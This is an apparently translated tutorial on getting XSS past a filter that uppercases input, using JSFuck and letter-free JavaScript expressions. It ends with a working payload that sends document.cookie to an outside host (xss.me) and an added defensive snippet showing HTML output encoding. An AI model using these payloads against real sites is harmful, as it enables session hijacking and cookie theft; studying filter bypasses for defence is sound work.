0x00 Question
An XSS case I ran into once: the application used PHP to convert every letter of the input to uppercase, and it also filtered keywords such as src as well as all kinds of tags.
0x01 Some Links
http://holyvier.blogspot.jp/2011 ... part-2-strings.html
http://holyvier.blogspot.jp/2011 ... getting-window.html
http://holyvier.blogspot.jp/2015 ... lenge-writeups.html
0x02 JSFuck bypass Uppercase
If there is no limit on the input length, JSFuck encoding can be used to get past the filter: JSFuck output contains no letters at all, so uppercasing has no effect on it.
For example:
<script>alert(1)</script>
After JSFuck encoding it becomes:
<script>[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()</script>
0x03 String-concatenation bypass of Uppercase
When JS evaluates certain operations it produces strings such as NaN, undefined or Infinity, and these can be saved in a variable, e.g.:
http://idoge.cc/img/xss_bypass_Uppercase/xss_bypass_Uppercase_1.png
By indexing into such strings we can obtain the individual characters we want, concatenate them, and execute the command we want, e.g.:
http://idoge.cc/img/xss_bypass_Uppercase/xss_bypass_Uppercase_2.png
Below is the lookup table of letters and the expressions that produce them. The entries marked * index into the string form of a native function, which varies between engines, so their offset differs between browsers:
a (!1+"")[1]
b (1+{})[3]
c (1+{})[6]
d ([][[]]+"")[2]
e ([][[]]+"")[3]
f ([][[]]+"")[4]
i ([][[]]+"")[5]
j (1+{})[4]
l (!1+"")[2]
m* (1..constructor+"")[11]
n ([][[]]+"")[1]
o (1+{})[2]
r (!0+"")[1]
s (!1+"")[3]
t (!0+"")[0]
u ([][[]]+"")[0]
v* ([].sort+"")[23]
y (1/0+"")[7]
This technique relies on two functions: constructor and toString.
Through constructor, starting from an empty array, one reaches the Function constructor ([]["constructor"]["constructor"]), which can execute arbitrary code:
http://idoge.cc/img/xss_bypass_Uppercase/xss_bypass_Uppercase_3.png
toString can produce arbitrary letters through radix conversion and concatenation, e.g. converting decimal to base 36:
17795081 -> alert
1966241552 -> window
1698633989591 -> location
1071753937337 -> document
767051222 -> cookie
Concatenating these pieces yields the desired payload, e.g.:
http://idoge.cc/img/xss_bypass_Uppercase/xss_bypass_Uppercase_4.png
The complete exploit is:
$=(1+{})[6]+(1+{})[2]+([][[]]+"")[1]+(!1+"")[3]+(!0+"")[0]+(!0+"")[1]+([][[]]+"")[0]+(1+{})[6]+(!0+"")[0]+(1+{})[2]+(!0+"")[1]; // "constructor"
$$=[][$][$]; // [].constructor.constructor, i.e. Function
_=(!0+"")[0]+(1+{})[2]+"S"+(!0+"")[0]+(!0+"")[1]+([][[]]+"")[5]+([][[]]+"")[1]+(""[$]+"")[14]; // "toString" (the capital S is already uppercase, so the filter does not matter)
$$(1966241552[_](36)+"."+1698633989591[_](36)+"='http://xss.me/'+"+1071753937337[_](36)+"."+767051222[_](36))(); // Function("window.location='http://xss.me/'+document.cookie")()
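The letter table in 0x03 and the base-36 words above can be checked in Node, and the same check makes the defender's point: uppercasing input is not sanitisation, contextual output encoding is. This is an added example, not code from the original post; uppercaseFilter and htmlEncode are my own stand-ins for the real filter and for a correct HTML-context encoder.

```javascript
// Added example (not from the original post): checks the post's letter table and base-36
// words in Node, shows that an uppercasing filter leaves them untouched, and contrasts
// that with HTML-context output encoding, the mitigation that actually works.

// Letter table from the post. The m* and v* rows are omitted: their index depends on how
// the engine stringifies native functions, so it differs between browsers.
const LETTER_EXPR = {
  a: '(!1+"")[1]',      b: '(1+{})[3]',        c: '(1+{})[6]',        d: '([][[]]+"")[2]',
  e: '([][[]]+"")[3]',  f: '([][[]]+"")[4]',   i: '([][[]]+"")[5]',   j: '(1+{})[4]',
  l: '(!1+"")[2]',      n: '([][[]]+"")[1]',   o: '(1+{})[2]',        r: '(!0+"")[1]',
  s: '(!1+"")[3]',      t: '(!0+"")[0]',       u: '([][[]]+"")[0]',   y: '(1/0+"")[7]',
};

// Evaluate one table expression; used only to verify the table, never on untrusted input.
function evalExpr(expr) {
  return Function('return (' + expr + ')')();
}

// Letters whose expression does not yield that letter; an empty list means the table holds.
function tableMismatches() {
  return Object.entries(LETTER_EXPR)
    .filter(([ch, expr]) => evalExpr(expr) !== ch)
    .map(([ch]) => ch);
}

// The post's filter reduced to the part that matters here: it uppercases every letter.
// The table expressions contain no letters at all, so the filter cannot change them.
function uppercaseFilter(s) {
  return s.toUpperCase();
}

// True when the filtered expression is byte-identical and still evaluates to the same letter.
function survivesUppercase(expr) {
  const filtered = uppercaseFilter(expr);
  return filtered === expr && evalExpr(filtered) === evalExpr(expr);
}

// Base-36 words from the post: a decimal literal becomes an identifier via toString(36).
function base36Word(n) {
  return n.toString(36);
}

// The mitigation: encode for the HTML text context instead of transforming or blacklisting
// input. Characters that could close the text context become entities, so letter case and
// letter-free expressions are irrelevant to the browser.
const HTML_ENTITIES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;', '/': '&#x2F;' };
function htmlEncode(s) {
  return s.replace(/[&<>"'\/]/g, c => HTML_ENTITIES[c]);
}
```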
That's all. Thanks to VV for the help, and corrections from fellow practitioners are welcome.